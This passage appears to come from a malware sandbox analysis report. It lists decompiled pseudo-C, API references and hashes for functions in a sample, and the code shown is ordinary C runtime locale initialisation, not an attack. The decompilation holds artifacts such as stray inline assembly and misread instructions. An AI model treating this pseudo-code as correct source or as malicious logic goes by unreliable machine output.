                0x00eb9419
                0x00eb9433
                0x00eb944a
                0x00eb9461
                0x00eb9478
                0x00eb9492
                0x00eb94a9
                0x00eb94c0
                0x00eb94d7
                0x00eb94f1
                0x00eb9508
                0x00eb951f
                0x00eb9536
                0x00eb9550
                0x00eb9567
                0x00eb957e
                0x00eb9595
                0x00eb95af
                0x00eb95c6
                0x00eb95dd
                0x00eb95f4
                0x00eb960e
                0x00eb9625
                0x00eb963c
                0x00eb9653
                0x00eb966d
                0x00eb9684
                0x00eb969b
                0x00eb96b2
                0x00eb96cc
                0x00eb96e3
                0x00eb96fa
                0x00eb9711
                0x00eb972b
                0x00eb9742
                0x00eb9759
                0x00eb9770
                0x00eb978d
                0x00eb9795

                APIs
                • ___getlocaleinfo.LIBCMT ref: 00EB92A9
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB92C3
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB92DA
                • ___getlocaleinfo.LIBCMT ref: 00EB92F1
                • ___getlocaleinfo.LIBCMT ref: 00EB9308
                • ___getlocaleinfo.LIBCMT ref: 00EB9322
                • ___getlocaleinfo.LIBCMT ref: 00EB9339
                • ___getlocaleinfo.LIBCMT ref: 00EB9350
                • ___getlocaleinfo.LIBCMT ref: 00EB936A
                • ___getlocaleinfo.LIBCMT ref: 00EB9387
                • ___getlocaleinfo.LIBCMT ref: 00EB939E
                • ___getlocaleinfo.LIBCMT ref: 00EB93B5
                • ___getlocaleinfo.LIBCMT ref: 00EB93CC
                • ___getlocaleinfo.LIBCMT ref: 00EB93E6
                • ___getlocaleinfo.LIBCMT ref: 00EB93FD
                • ___getlocaleinfo.LIBCMT ref: 00EB9414
                • ___getlocaleinfo.LIBCMT ref: 00EB942B
                • ___getlocaleinfo.LIBCMT ref: 00EB9445
                • ___getlocaleinfo.LIBCMT ref: 00EB945C
                • ___getlocaleinfo.LIBCMT ref: 00EB9473
                • ___getlocaleinfo.LIBCMT ref: 00EB948A
                • ___getlocaleinfo.LIBCMT ref: 00EB94A4
                • ___getlocaleinfo.LIBCMT ref: 00EB94BB
                • ___getlocaleinfo.LIBCMT ref: 00EB94D2
                • ___getlocaleinfo.LIBCMT ref: 00EB94E9
                • ___getlocaleinfo.LIBCMT ref: 00EB9503
                • ___getlocaleinfo.LIBCMT ref: 00EB951A
                • ___getlocaleinfo.LIBCMT ref: 00EB9531
                • ___getlocaleinfo.LIBCMT ref: 00EB9548
                • ___getlocaleinfo.LIBCMT ref: 00EB9562
                • ___getlocaleinfo.LIBCMT ref: 00EB9579
                • ___getlocaleinfo.LIBCMT ref: 00EB9590
                • ___getlocaleinfo.LIBCMT ref: 00EB95A7
                • ___getlocaleinfo.LIBCMT ref: 00EB95C1
                • ___getlocaleinfo.LIBCMT ref: 00EB95D8
                • ___getlocaleinfo.LIBCMT ref: 00EB95EF
                • ___getlocaleinfo.LIBCMT ref: 00EB9606
                • ___getlocaleinfo.LIBCMT ref: 00EB9620
                • ___getlocaleinfo.LIBCMT ref: 00EB9637
                • ___getlocaleinfo.LIBCMT ref: 00EB964E
                • ___getlocaleinfo.LIBCMT ref: 00EB9665
                • ___getlocaleinfo.LIBCMT ref: 00EB967F
                • ___getlocaleinfo.LIBCMT ref: 00EB9696
                • ___getlocaleinfo.LIBCMT ref: 00EB96AD
                • ___getlocaleinfo.LIBCMT ref: 00EB96C4
                • ___getlocaleinfo.LIBCMT ref: 00EB96DE
                • ___getlocaleinfo.LIBCMT ref: 00EB96F5
                • ___getlocaleinfo.LIBCMT ref: 00EB970C
                • ___getlocaleinfo.LIBCMT ref: 00EB9723
                • ___getlocaleinfo.LIBCMT ref: 00EB973D
                • ___getlocaleinfo.LIBCMT ref: 00EB9754
                • ___getlocaleinfo.LIBCMT ref: 00EB976B
                • ___getlocaleinfo.LIBCMT ref: 00EB9785
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                • String ID:
                • API String ID: 2187842456-0
                • Opcode ID: e3b57d8fdd040759e5965ee81e5fb9311759b06fcb6a17c9cdf6db9e33a1ee90
                • Instruction ID: 119438a1228bf96623d1cbdbd932c6f78f2b3f9b673c084a5cf924c451290bd3
                • Opcode Fuzzy Hash: e3b57d8fdd040759e5965ee81e5fb9311759b06fcb6a17c9cdf6db9e33a1ee90
                • Instruction Fuzzy Hash: 1EF1C7F7E412097AF72696E08C86FEBF7ECA704B40F145622F715F60C2FAA4665446A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA26FB Relevance: 36.2, APIs: 24, Instructions: 229COMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E00EA26FB(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t86;
				char _t153;
				void* _t167;
				void* _t180;
				void* _t187;
				char* _t193;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				intOrPtr* _t219;
				char* _t221;
				void* _t222;
				void* _t223;

				_t180 = __ebx;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + 0x6a)) =  *((intOrPtr*)(__eax + 0x6a)) + __edx;
				asm("adc eax, 0xec458d57");
				_push(1);
				_push(__eax);
				_t199 = E00EB4CB1(__ebx, __edi, __esi);
				_t200 = _t199 | E00EB4CB1(__ebx, __edi, _t199, _t222 - 0x14, 1, __edi, 0x14,  *((intOrPtr*)(_t222 + 8)) + 0x10);
				_t201 = _t200 | E00EB4CB1(__ebx, __edi, _t200, _t222 - 0x14, 1, __edi, 0x16,  *((intOrPtr*)(_t222 + 8)) + 0x14);
				_t202 = _t201 | E00EB4CB1(__ebx, __edi, _t201, _t222 - 0x14, 1, __edi, 0x17,  *((intOrPtr*)(_t222 + 8)) + 0x18);
				_t86 =  *((intOrPtr*)(_t222 + 8)) + 0x1c;
				 *((intOrPtr*)(_t222 - 0xc)) = _t86;
				_push(_t86);
				_push(0x18);
				asm("sbb [edi-0x73], dl");
				_t223 = _t222 + 1;
				asm("in al, dx");
				_push(1);
				_push(_t86);
				_t203 = _t202 | E00EB4CB1(__ebx, __edi, _t202);
				_t204 = _t203 | E00EB4CB1(__ebx, __edi, _t203, _t223 - 0x14, 1, __edi, 0x50,  *((intOrPtr*)(_t223 + 8)) + 0x20);
				_t205 = _t204 | E00EB4CB1(__ebx, __edi, _t204, _t223 - 0x14, 1, __edi, 0x51,  *((intOrPtr*)(_t223 + 8)) + 0x24);
				_t206 = _t205 | E00EB4CB1(__ebx, __edi, _t205, _t223 - 0x14, 0, __edi, 0x1a,  *((intOrPtr*)(_t223 + 8)) + 0x28);
				_t207 = _t206 | E00EB4CB1(__ebx, __edi, _t206, _t223 - 0x14, 0, __edi, 0x19,  *((intOrPtr*)(_t223 + 8)) + 0x29);
				_t208 = _t207 | E00EB4CB1(__ebx, __edi, _t207, _t223 - 0x14, 0, __edi, 0x54,  *((intOrPtr*)(_t223 + 8)) + 0x2a);
				_t209 = _t208 | E00EB4CB1(__ebx, __edi, _t208, _t223 - 0x14, 0, __edi, 0x55,  *((intOrPtr*)(_t223 + 8)) + 0x2b);
				_t210 = _t209 | E00EB4CB1(__ebx, __edi, _t209, _t223 - 0x14, 0, __edi, 0x56,  *((intOrPtr*)(_t223 + 8)) + 0x2c);
				_t211 = _t210 | E00EB4CB1(__ebx, __edi, _t210, _t223 - 0x14, 0, __edi, 0x57,  *((intOrPtr*)(_t223 + 8)) + 0x2d);
				_t212 = _t211 | E00EB4CB1(__ebx, __edi, _t211, _t223 - 0x14, 0, __edi, 0x52,  *((intOrPtr*)(_t223 + 8)) + 0x2e);
				_t213 = _t212 | E00EB4CB1(__ebx, __edi, _t212, _t223 - 0x14, 0, __edi, 0x53,  *((intOrPtr*)(_t223 + 8)) + 0x2f);
				_t214 = _t213 | E00EB4CB1(__ebx, __edi, _t213, _t223 - 0x14, 2, __edi, 0x15,  *((intOrPtr*)(_t223 + 8)) + 0x38);
				_t215 = _t214 | E00EB4CB1(__ebx, __edi, _t214, _t223 - 0x14, 2, __edi, 0x14,  *((intOrPtr*)(_t223 + 8)) + 0x3c);
				_t216 = _t215 | E00EB4CB1(__ebx, __edi, _t215, _t223 - 0x14, 2, __edi, 0x16,  *((intOrPtr*)(_t223 + 8)) + 0x40);
				_t217 = _t216 | E00EB4CB1(__ebx, __edi, _t216, _t223 - 0x14, 2, __edi, 0x17,  *((intOrPtr*)(_t223 + 8)) + 0x44);
				_t218 = _t217 | E00EB4CB1(__ebx, __edi, _t217, _t223 - 0x14, 2, __edi, 0x50,  *((intOrPtr*)(_t223 + 8)) + 0x48);
				if((E00EB4CB1(__ebx, __edi, _t218, _t223 - 0x14, 2, __edi, 0x51,  *((intOrPtr*)(_t223 + 8)) + 0x4c) | _t218) == 0) {
					_t193 =  *((intOrPtr*)( *((intOrPtr*)(_t223 - 0xc))));
					while( *_t193 != 0) {
						_t153 =  *_t193;
						if(_t153 < 0x30 || _t153 > 0x39) {
							if(_t153 != 0x3b) {
								goto L9;
							} else {
								_t221 = _t193;
								do {
									 *_t221 =  *((intOrPtr*)(_t221 + 1));
									_t221 = _t221 + 1;
								} while ( *_t221 != 0);
								continue;
							}
							L18:
							_t187 = 0xffffffffffffffff;
							if( *((intOrPtr*)(_t180 + 0x80)) != 0) {
								asm("lock xadd [edx], eax");
							}
							if( *((intOrPtr*)(_t180 + 0x78)) != 0) {
								asm("lock xadd [eax], ecx");
								if(_t187 == 1) {
									E00EB2248( *((intOrPtr*)(_t180 + 0x84)));
									E00EB2248( *((intOrPtr*)(_t180 + 0x78)));
								}
							}
							 *((intOrPtr*)(_t180 + 0x78)) =  *((intOrPtr*)(_t223 - 4));
							_t167 = 0;
							 *((intOrPtr*)(_t180 + 0x80)) = _t196;
							 *((intOrPtr*)(_t180 + 0x84)) = _t219;
							goto L24;
						} else {
							 *_t193 = _t153 - 0x30;
							L9:
							_t193 = _t193 + 1;
						}
					}
					_t219 =  *((intOrPtr*)(_t223 + 8));
					_t196 =  *((intOrPtr*)(_t223 - 8));
					 *_t219 =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84))));
					 *((intOrPtr*)(_t219 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 4));
					 *((intOrPtr*)(_t219 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 8));
					 *((intOrPtr*)(_t219 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x30));
					 *((intOrPtr*)(_t219 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x34));
					 *((intOrPtr*)( *((intOrPtr*)(_t223 - 4)))) = 1;
					if(_t196 != 0) {
						 *_t196 = 1;
					}
					goto L18;
				} else {
					E00EB842D( *((intOrPtr*)(_t223 + 8)));
					E00EB2248( *((intOrPtr*)(_t223 + 8)));
					E00EB2248( *((intOrPtr*)(_t223 - 4)));
					E00EB2248( *((intOrPtr*)(_t223 - 8)));
					_t167 = 1;
				}
				L24:
				return _t167;
			}


































                0x00ea26fb
                0x00eb85cc
                0x00eb85ce
                0x00eb85d1
                0x00eb85d6
                0x00eb85d8
                0x00eb85e1
                0x00eb85f5
                0x00eb860c
                0x00eb8626
                0x00eb862b
                0x00eb862e
                0x00eb8631
                0x00eb8632
                0x00eb8633
                0x00eb8636
                0x00eb8637
                0x00eb8638
                0x00eb863a
                0x00eb8640
                0x00eb8657
                0x00eb866e
                0x00eb8688
                0x00eb869f
                0x00eb86b6
                0x00eb86cd
                0x00eb86e7
                0x00eb86fe
                0x00eb8715
                0x00eb872c
                0x00eb8746
                0x00eb875d
                0x00eb8774
                0x00eb878b
                0x00eb87a5
                0x00eb87c1
                0x00eb87ef
                0x00eb8802
                0x00eb87f3
                0x00eb87f7
                0x00eb880b
                0x00000000
                0x00eb880d
                0x00eb880d
                0x00eb880f
                0x00eb8812
                0x00eb8814
                0x00eb8817
                0x00000000
                0x00eb881c
                0x00eb8879
                0x00eb887f
                0x00eb8884
                0x00eb8888
                0x00eb8888
                0x00eb8891
                0x00eb8893
                0x00eb8898
                0x00eb88a0
                0x00eb88a8
                0x00eb88ae
                0x00eb8898
                0x00eb88b2
                0x00eb88b5
                0x00eb88b7
                0x00eb88bd
                0x00000000
                0x00eb87fd
                0x00eb87ff
                0x00eb8801
                0x00eb8801
                0x00eb8801
                0x00eb87f7
                0x00eb8833
                0x00eb8837
                0x00eb883c
                0x00eb8847
                0x00eb8853
                0x00eb885f
                0x00eb886b
                0x00eb8871
                0x00eb8875
                0x00eb8877
                0x00eb8877
                0x00000000
                0x00eb87c3
                0x00eb87c7
                0x00eb87cd
                0x00eb87d6
                0x00eb87df
                0x00eb8575
                0x00eb8575
                0x00eb88c3
                0x00eb88c9

                APIs
                • ___getlocaleinfo.LIBCMT ref: 00EB85D9
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB85F0
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB8607
                • ___getlocaleinfo.LIBCMT ref: 00EB861E
                • ___getlocaleinfo.LIBCMT ref: 00EB863B
                • ___getlocaleinfo.LIBCMT ref: 00EB8652
                • ___getlocaleinfo.LIBCMT ref: 00EB8669
                • ___getlocaleinfo.LIBCMT ref: 00EB8680
                • ___getlocaleinfo.LIBCMT ref: 00EB869A
                • ___getlocaleinfo.LIBCMT ref: 00EB86B1
                • ___getlocaleinfo.LIBCMT ref: 00EB86C8
                • ___getlocaleinfo.LIBCMT ref: 00EB86DF
                • ___getlocaleinfo.LIBCMT ref: 00EB86F9
                • ___getlocaleinfo.LIBCMT ref: 00EB8710
                • ___getlocaleinfo.LIBCMT ref: 00EB8727
                • ___getlocaleinfo.LIBCMT ref: 00EB873E
                • ___getlocaleinfo.LIBCMT ref: 00EB8758
                • ___getlocaleinfo.LIBCMT ref: 00EB876F
                • ___getlocaleinfo.LIBCMT ref: 00EB8786
                • ___getlocaleinfo.LIBCMT ref: 00EB879D
                • ___getlocaleinfo.LIBCMT ref: 00EB87B7
                • _free.LIBCMT ref: 00EB87CD
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • _free.LIBCMT ref: 00EB87D6
                • _free.LIBCMT ref: 00EB87DF
                • _free.LIBCMT ref: 00EB88A0
                • _free.LIBCMT ref: 00EB88A8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8448
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB845A
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB846C
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB847E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8490
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84A2
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84B4
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84C6
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84D8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84EA
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84FC
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB850E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8520
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ___getlocaleinfo_free$InfoLocale___crt__calloc_crt$ErrorLast$FreeHeap__invoke_watson
                • String ID:
                • API String ID: 129311744-0
                • Opcode ID: e8807c014097cdb2faa6682f409b6bd3796282197e566080f324ed0dba5fe8c3
                • Instruction ID: 5e4805bc4c9095b39d420b9809d2b337096e8ce33fadad232659a6ba9724dcb7
                • Opcode Fuzzy Hash: e8807c014097cdb2faa6682f409b6bd3796282197e566080f324ed0dba5fe8c3
                • Instruction Fuzzy Hash: 8061E3B2D402087AEB20DBA8CC46FEF7BEC9B09B85F145510FB04FB1C2D5A4DA549A65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA67B8 Relevance: 30.2, APIs: 20, Instructions: 187COMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00EA67B8(void* __eax, void* __ebx, void* __edi, signed int __esi) {
				char _t130;
				void* _t144;
				void* _t157;
				void* _t162;
				char* _t167;
				intOrPtr* _t170;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				char* _t191;
				void* _t192;
				void* _t193;

				_t157 = __ebx;
				asm("sbb [edi-0x73], dl");
				_t193 = _t192 + 1;
				asm("in al, dx");
				_push(1);
				_t173 = __esi | E00EB4CB1(__ebx, __edi, __esi);
				_t174 = _t173 | E00EB4CB1(__ebx, __edi, _t173, _t193 - 0x14, 1, __edi, 0x50,  *((intOrPtr*)(_t193 + 8)) + 0x20);
				_t175 = _t174 | E00EB4CB1(__ebx, __edi, _t174, _t193 - 0x14, 1, __edi, 0x51,  *((intOrPtr*)(_t193 + 8)) + 0x24);
				_t176 = _t175 | E00EB4CB1(__ebx, __edi, _t175, _t193 - 0x14, 0, __edi, 0x1a,  *((intOrPtr*)(_t193 + 8)) + 0x28);
				_t177 = _t176 | E00EB4CB1(__ebx, __edi, _t176, _t193 - 0x14, 0, __edi, 0x19,  *((intOrPtr*)(_t193 + 8)) + 0x29);
				_t178 = _t177 | E00EB4CB1(__ebx, __edi, _t177, _t193 - 0x14, 0, __edi, 0x54,  *((intOrPtr*)(_t193 + 8)) + 0x2a);
				_t179 = _t178 | E00EB4CB1(__ebx, __edi, _t178, _t193 - 0x14, 0, __edi, 0x55,  *((intOrPtr*)(_t193 + 8)) + 0x2b);
				_t180 = _t179 | E00EB4CB1(__ebx, __edi, _t179, _t193 - 0x14, 0, __edi, 0x56,  *((intOrPtr*)(_t193 + 8)) + 0x2c);
				_t181 = _t180 | E00EB4CB1(__ebx, __edi, _t180, _t193 - 0x14, 0, __edi, 0x57,  *((intOrPtr*)(_t193 + 8)) + 0x2d);
				_t182 = _t181 | E00EB4CB1(__ebx, __edi, _t181, _t193 - 0x14, 0, __edi, 0x52,  *((intOrPtr*)(_t193 + 8)) + 0x2e);
				_t183 = _t182 | E00EB4CB1(__ebx, __edi, _t182, _t193 - 0x14, 0, __edi, 0x53,  *((intOrPtr*)(_t193 + 8)) + 0x2f);
				_t184 = _t183 | E00EB4CB1(__ebx, __edi, _t183, _t193 - 0x14, 2, __edi, 0x15,  *((intOrPtr*)(_t193 + 8)) + 0x38);
				_t185 = _t184 | E00EB4CB1(__ebx, __edi, _t184, _t193 - 0x14, 2, __edi, 0x14,  *((intOrPtr*)(_t193 + 8)) + 0x3c);
				_t186 = _t185 | E00EB4CB1(__ebx, __edi, _t185, _t193 - 0x14, 2, __edi, 0x16,  *((intOrPtr*)(_t193 + 8)) + 0x40);
				_t187 = _t186 | E00EB4CB1(__ebx, __edi, _t186, _t193 - 0x14, 2, __edi, 0x17,  *((intOrPtr*)(_t193 + 8)) + 0x44);
				_t188 = _t187 | E00EB4CB1(__ebx, __edi, _t187, _t193 - 0x14, 2, __edi, 0x50,  *((intOrPtr*)(_t193 + 8)) + 0x48);
				if((E00EB4CB1(__ebx, __edi, _t188, _t193 - 0x14, 2, __edi, 0x51,  *((intOrPtr*)(_t193 + 8)) + 0x4c) | _t188) == 0) {
					_t167 =  *((intOrPtr*)( *((intOrPtr*)(_t193 - 0xc))));
					while( *_t167 != 0) {
						_t130 =  *_t167;
						if(_t130 < 0x30 || _t130 > 0x39) {
							if(_t130 != 0x3b) {
								goto L8;
							} else {
								_t191 = _t167;
								do {
									 *_t191 =  *((intOrPtr*)(_t191 + 1));
									_t191 = _t191 + 1;
								} while ( *_t191 != 0);
								continue;
							}
							L19:
							if( *((intOrPtr*)(_t157 + 0x78)) != 0) {
								asm("lock xadd [eax], ecx");
								if(_t162 == 1) {
									E00EB2248( *((intOrPtr*)(_t157 + 0x84)));
									E00EB2248( *((intOrPtr*)(_t157 + 0x78)));
								}
							}
							 *((intOrPtr*)(_t157 + 0x78)) =  *((intOrPtr*)(_t193 - 4));
							_t144 = 0;
							 *((intOrPtr*)(_t157 + 0x80)) = _t170;
							 *((intOrPtr*)(_t157 + 0x84)) = _t189;
							goto L23;
						} else {
							 *_t167 = _t130 - 0x30;
							L8:
							_t167 = _t167 + 1;
						}
					}
					_t189 =  *((intOrPtr*)(_t193 + 8));
					_t170 =  *((intOrPtr*)(_t193 - 8));
					 *_t189 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84))));
					 *((intOrPtr*)(_t189 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 4));
					 *((intOrPtr*)(_t189 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 8));
					 *((intOrPtr*)(_t189 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 0x30));
					 *((intOrPtr*)(_t189 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 0x34));
					 *((intOrPtr*)( *((intOrPtr*)(_t193 - 4)))) = 1;
					if(_t170 != 0) {
						 *_t170 = 1;
					}
					_t162 = 0xffffffffffffffff;
					if( *((intOrPtr*)(_t157 + 0x80)) != 0) {
						asm("lock xadd [edx], eax");
					}
					goto L19;
				} else {
					E00EB842D( *((intOrPtr*)(_t193 + 8)));
					E00EB2248( *((intOrPtr*)(_t193 + 8)));
					E00EB2248( *((intOrPtr*)(_t193 - 4)));
					E00EB2248( *((intOrPtr*)(_t193 - 8)));
					_t144 = 1;
				}
				L23:
				return _t144;
			}





























                0x00ea67b8
                0x00eb8633
                0x00eb8636
                0x00eb8637
                0x00eb8638
                0x00eb8640
                0x00eb8657
                0x00eb866e
                0x00eb8688
                0x00eb869f
                0x00eb86b6
                0x00eb86cd
                0x00eb86e7
                0x00eb86fe
                0x00eb8715
                0x00eb872c
                0x00eb8746
                0x00eb875d
                0x00eb8774
                0x00eb878b
                0x00eb87a5
                0x00eb87c1
                0x00eb87ef
                0x00eb8802
                0x00eb87f3
                0x00eb87f7
                0x00eb880b
                0x00000000
                0x00eb880d
                0x00eb880d
                0x00eb880f
                0x00eb8812
                0x00eb8814
                0x00eb8817
                0x00000000
                0x00eb881c
                0x00eb888c
                0x00eb8891
                0x00eb8893
                0x00eb8898
                0x00eb88a0
                0x00eb88a8
                0x00eb88ae
                0x00eb8898
                0x00eb88b2
                0x00eb88b5
                0x00eb88b7
                0x00eb88bd
                0x00000000
                0x00eb87fd
                0x00eb87ff
                0x00eb8801
                0x00eb8801
                0x00eb8801
                0x00eb87f7
                0x00eb8833
                0x00eb8837
                0x00eb883c
                0x00eb8847
                0x00eb8853
                0x00eb885f
                0x00eb886b
                0x00eb8871
                0x00eb8875
                0x00eb8877
                0x00eb8877
                0x00eb887f
                0x00eb8884
                0x00eb8888
                0x00eb8888
                0x00000000
                0x00eb87c3
                0x00eb87c7
                0x00eb87cd
                0x00eb87d6
                0x00eb87df
                0x00eb8575
                0x00eb8575
                0x00eb88c3
                0x00eb88c9

                APIs
                • ___getlocaleinfo.LIBCMT ref: 00EB863B
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB8652
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB8669
                • ___getlocaleinfo.LIBCMT ref: 00EB8680
                • ___getlocaleinfo.LIBCMT ref: 00EB869A
                • ___getlocaleinfo.LIBCMT ref: 00EB86B1
                • ___getlocaleinfo.LIBCMT ref: 00EB86C8
                • ___getlocaleinfo.LIBCMT ref: 00EB86DF
                • ___getlocaleinfo.LIBCMT ref: 00EB86F9
                • ___getlocaleinfo.LIBCMT ref: 00EB8710
                • ___getlocaleinfo.LIBCMT ref: 00EB8727
                • ___getlocaleinfo.LIBCMT ref: 00EB873E
                • ___getlocaleinfo.LIBCMT ref: 00EB8758
                • ___getlocaleinfo.LIBCMT ref: 00EB876F
                • ___getlocaleinfo.LIBCMT ref: 00EB8786
                • ___getlocaleinfo.LIBCMT ref: 00EB879D
                • ___getlocaleinfo.LIBCMT ref: 00EB87B7
                • _free.LIBCMT ref: 00EB87CD
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • _free.LIBCMT ref: 00EB87D6
                • _free.LIBCMT ref: 00EB87DF
                • _free.LIBCMT ref: 00EB88A0
                • _free.LIBCMT ref: 00EB88A8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8448
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB845A
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB846C
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB847E
